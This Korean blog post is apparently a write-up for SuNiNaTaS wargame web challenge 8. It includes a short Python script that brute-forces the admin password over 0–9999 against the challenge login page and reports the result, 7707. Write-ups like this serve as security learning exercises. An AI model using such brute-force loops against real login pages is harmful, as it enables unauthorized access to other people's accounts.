| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 |
Tags
- 메소드
- 조건문
- github
- htmlspecialchars
- 백준 알고리즘
- window
- 함수
- 파이썬
- 사칙연산
- 김성엽 대표님
- Pwndbg
- element 조회
- 포인터
- 객체
- document
- burp suite
- 백준 파이썬
- 배열
- python
- xss game
- lord of sql injection
- 자바스크립트
- blind sql injection
- object
- suninatas 풀이
- IF문
- property
- xss game 풀이
- jQuery
- sql injection
Archives
- Today
- Total
power-girl0-0
[ Web ] 8번 본문
728x90
써니나타스
웹해킹, 포렌식, 리버싱, 암호학, 해킹 워게임 제공.
www.suninatas.com
[ 풀이 ]
8번 문제는 로그인 창이 있는 페이지이다.
먼저, 소스코드를 살펴보자!!
소스코드를 보니, 주석처리로 힌트를 주고 있다.
id는 admin이고 password는 0~9999까지라는 뜻이다.
그렇다면 password를 0~9999까지 하나씩 입력하면, admin의 비밀번호를 알 수 있을 것이다.
직접 하나씩 입력하기에는 많은 시간이 필요하기 때문에, 파이썬으로 간단하게 구현해서 비밀번호를 찾아냈다.
코드는 아래와 같다.
import requests
url ='http://suninatas.com/challenge/web08/web08.asp?'
flag = 0
for value in range(0, 10000):
data = {'id':'admin','pw': value}
response = requests.post(url, data=data)
if("Auth" in response.text):
flag = value
break
print(value)
print("flag : ",flag)
그 결과, 아래와 같이 7707이라는 값을 뽑아줬다.
찾아낸 값을 password에 입력하고, id에는 admin을 입력하니 Congratulation문구를 출력해준다.
확인을 누르면 flag값을 얻을 수 있다.
728x90
'War game > suninatas' 카테고리의 다른 글
| [ Web ] 6번 (0) | 2021.03.18 |
|---|---|
| [ Web ] 5번 (0) | 2021.03.18 |
| [ Web ] 4번 (0) | 2021.03.18 |
| [ Web ] 3번 (0) | 2021.03.18 |
| [ Web ] 2번 (0) | 2021.03.18 |
'War game/suninatas' Related Articles
more
Comments